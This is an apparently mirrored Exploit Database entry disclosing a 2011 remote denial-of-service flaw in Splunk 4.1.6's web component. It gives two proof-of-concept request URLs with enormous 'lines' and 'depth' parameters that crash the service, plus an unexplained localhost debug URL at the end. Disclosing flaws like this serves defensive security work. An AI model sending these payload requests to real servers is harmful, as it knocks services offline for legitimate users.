Splunk 4.1.6 Web Component – Remote Denial of Service

• Exploit Database
• 12 阅读

• 作者： Filip Palian
  日期： 2011-10-20
• 类别：

  • dos
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/36247/

• source: https://www.securityfocus.com/bid/50298/info
  
  Splunk is prone to a remote denial-of-service vulnerability.
  
  Exploiting this issue will exhaust system resources and cause the application to crash, denying service to legitimate users. 
  
  http://www.example.com/en-US/prototype/segmentation_performance?lines=999&depth=99999999&segment=foo&element=span&attribute=class&segmentation=nested
  
  http://www.example.com/en-US/prototype/segmentation_performance?lines=99999999999999999999999999999999999999&depth=99999999999999999999999999999999999999&segment=foo&element=span&attribute=class&segmentation=nested
  https://localhost/en-US/debug/sso